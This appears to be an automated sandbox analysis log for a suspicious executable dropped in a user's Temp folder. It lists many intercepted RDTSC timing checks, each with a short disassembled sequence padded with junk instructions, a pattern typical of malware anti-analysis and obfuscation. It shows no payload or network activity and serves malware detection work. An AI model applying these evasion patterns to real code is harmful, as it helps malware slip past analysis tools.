Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C31B61 second address: C31B65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C31B65 second address: C31B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C34CC4 second address: C34CEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007F34D94219E8h 0x0000000a popad 0x0000000b push eax 0x0000000c jp 00007F34D94219DEh 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2EB2D second address: C2EB33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DB17 second address: C2DB2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F34D94219E0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DB2C second address: C2DB39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DB39 second address: C2DB47 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C2DC0F second address: C2DC1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F34D8F44CB6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C32D02 second address: C32D08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C34F71 second address: C34F8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC8h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C3E07B second address: C3E0A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007F34D94219E8h 0x0000000c pushad 0x0000000d jg 00007F34D94219D6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C3E0A3 second address: C3E0A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440B0 second address: C440DB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F34D94219DAh 0x00000012 jbe 00007F34D94219D6h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440DB second address: C440E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F34D8F44CB6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440E5 second address: C440E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C440E9 second address: C44134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c pushad 0x0000000d jmp 00007F34D8F44CC1h 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 pop ecx 0x00000016 popad 0x00000017 mov eax, dword ptr [eax] 0x00000019 pushad 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d jno 00007F34D8F44CB6h 0x00000023 popad 0x00000024 ja 00007F34D8F44CB8h 0x0000002a popad 0x0000002b mov dword ptr [esp+04h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 jnl 00007F34D8F44CBCh 0x00000037 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C44134 second address: C4413A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4413A second address: C4413E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4908C second address: C49090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C49090 second address: C49094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C49094 second address: C490BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F34D94219F6h 0x0000000c jmp 00007F34D94219E2h 0x00000011 jbe 00007F34D94219DEh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C485EC second address: C48607 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C48607 second address: C4860B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4860B second address: C4860F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C488C6 second address: C488CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C488CC second address: C48903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F34D8F44CC6h 0x0000000e pop ecx 0x0000000f jmp 00007F34D8F44CBFh 0x00000014 jnp 00007F34D8F44CBCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4DF1A second address: C4DF1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1B579 second address: C1B592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC5h 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1B592 second address: C1B596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C179 second address: C1C17F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C17F second address: C1C19B instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F34D94219DAh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C19B second address: C1C19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C19F second address: C1C231 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 pushad 0x00000009 movzx ebx, di 0x0000000c js 00007F34D94219DCh 0x00000012 mov ebx, dword ptr [ebp+122D3555h] 0x00000018 popad 0x00000019 lea eax, dword ptr [ebp+1246FC53h] 0x0000001f mov dword ptr [ebp+122D1F4Eh], ebx 0x00000025 push eax 0x00000026 jnc 00007F34D94219DAh 0x0000002c mov dword ptr [esp], eax 0x0000002f push 00000000h 0x00000031 push ebp 0x00000032 call 00007F34D94219D8h 0x00000037 pop ebp 0x00000038 mov dword ptr [esp+04h], ebp 0x0000003c add dword ptr [esp+04h], 0000001Dh 0x00000044 inc ebp 0x00000045 push ebp 0x00000046 ret 0x00000047 pop ebp 0x00000048 ret 0x00000049 jmp 00007F34D94219DAh 0x0000004e lea eax, dword ptr [ebp+1246FC0Fh] 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007F34D94219D8h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000015h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e mov edi, dword ptr [ebp+122D1FCAh] 0x00000074 push eax 0x00000075 push eax 0x00000076 push edx 0x00000077 push eax 0x00000078 push edx 0x00000079 pushad 0x0000007a popad 0x0000007b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C231 second address: C1C237 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1C237 second address: C0664D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cx, di 0x0000000e call dword ptr [ebp+122D27D0h] 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jnp 00007F34D94219D6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C4DAB2 second address: C4DAB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C524A7 second address: C524CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E8h 0x00000007 jc 00007F34D94219D6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C52BB0 second address: C52BC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C52BC6 second address: C52BD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jp 00007F34D94219D6h 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C52D40 second address: C52D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CC9h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5323E second address: C53244 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C53244 second address: C53255 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jng 00007F34D8F44CB6h 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C53255 second address: C5327A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F34D94219E7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jl 00007F34D94219DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C51C2B second address: C51C5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F34D8F44CBFh 0x0000000a jmp 00007F34D8F44CC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 pop edi 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A7FB second address: C5A7FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A942 second address: C5A946 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5AD2B second address: C5AD30 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A525 second address: C5A52F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F34D8F44CB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5A52F second address: C5A538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5B11E second address: C5B14F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F34D8F44CD1h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F34D8F44CC9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007F34D8F44CB6h 0x00000017 jng 00007F34D8F44CB6h 0x0000001d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5B14F second address: C5B153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C5F08C second address: C5F091 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61B90 second address: C61B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61B94 second address: C61B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61B98 second address: C61BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007F34D94219F5h 0x00000011 je 00007F34D94219D6h 0x00000017 jmp 00007F34D94219E9h 0x0000001c jo 00007F34D94219F5h 0x00000022 jne 00007F34D94219D6h 0x00000028 jmp 00007F34D94219E9h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C61BED second address: C61C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F34D8F44CB6h 0x0000000a jmp 00007F34D8F44CBEh 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C63F16 second address: C63F1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C665CE second address: C665D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C665D5 second address: C665DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C665DC second address: C665E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6C9E0 second address: C6CA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F34D94219D6h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007F34D94219E4h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jns 00007F34D94219D6h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6CA0F second address: C6CA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007F34D8F44CB6h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6B292 second address: C6B2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F34D94219DDh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6B2AA second address: C6B2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC0h 0x00000007 jmp 00007F34D8F44CC7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6B58C second address: C6B593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1BB27 second address: C1BB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C1BBEC second address: C1BBF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BCF5 second address: C6BD0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F34D8F44CC0h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD0F second address: C6BD19 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F34D94219D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD19 second address: C6BD61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 jmp 00007F34D8F44CC1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007F34D8F44CC2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD61 second address: C6BD71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F34D94219DAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6BD71 second address: C6BD76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6F876 second address: C6F886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DCh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6F886 second address: C6F8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007F34D8F44CC3h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6F8A6 second address: C6F8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D94219DDh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCA4 second address: C6FCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBDh 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCB5 second address: C6FCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCB9 second address: C6FCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F34D8F44CBEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCD3 second address: C6FCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FCD7 second address: C6FCDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C6FF82 second address: C6FF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C700E0 second address: C700E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C748A6 second address: C748AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C748AA second address: C748DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F34D8F44CBBh 0x0000000d pushad 0x0000000e js 00007F34D8F44CB8h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 jnc 00007F34D8F44CB6h 0x0000001d jmp 00007F34D8F44CBAh 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C748DB second address: C748F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F34D94219D6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 ja 00007F34D94219D6h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7A3E8 second address: C7A3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exe RDTSC instruction interceptor: First address: C7AA07 second address: C7AA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
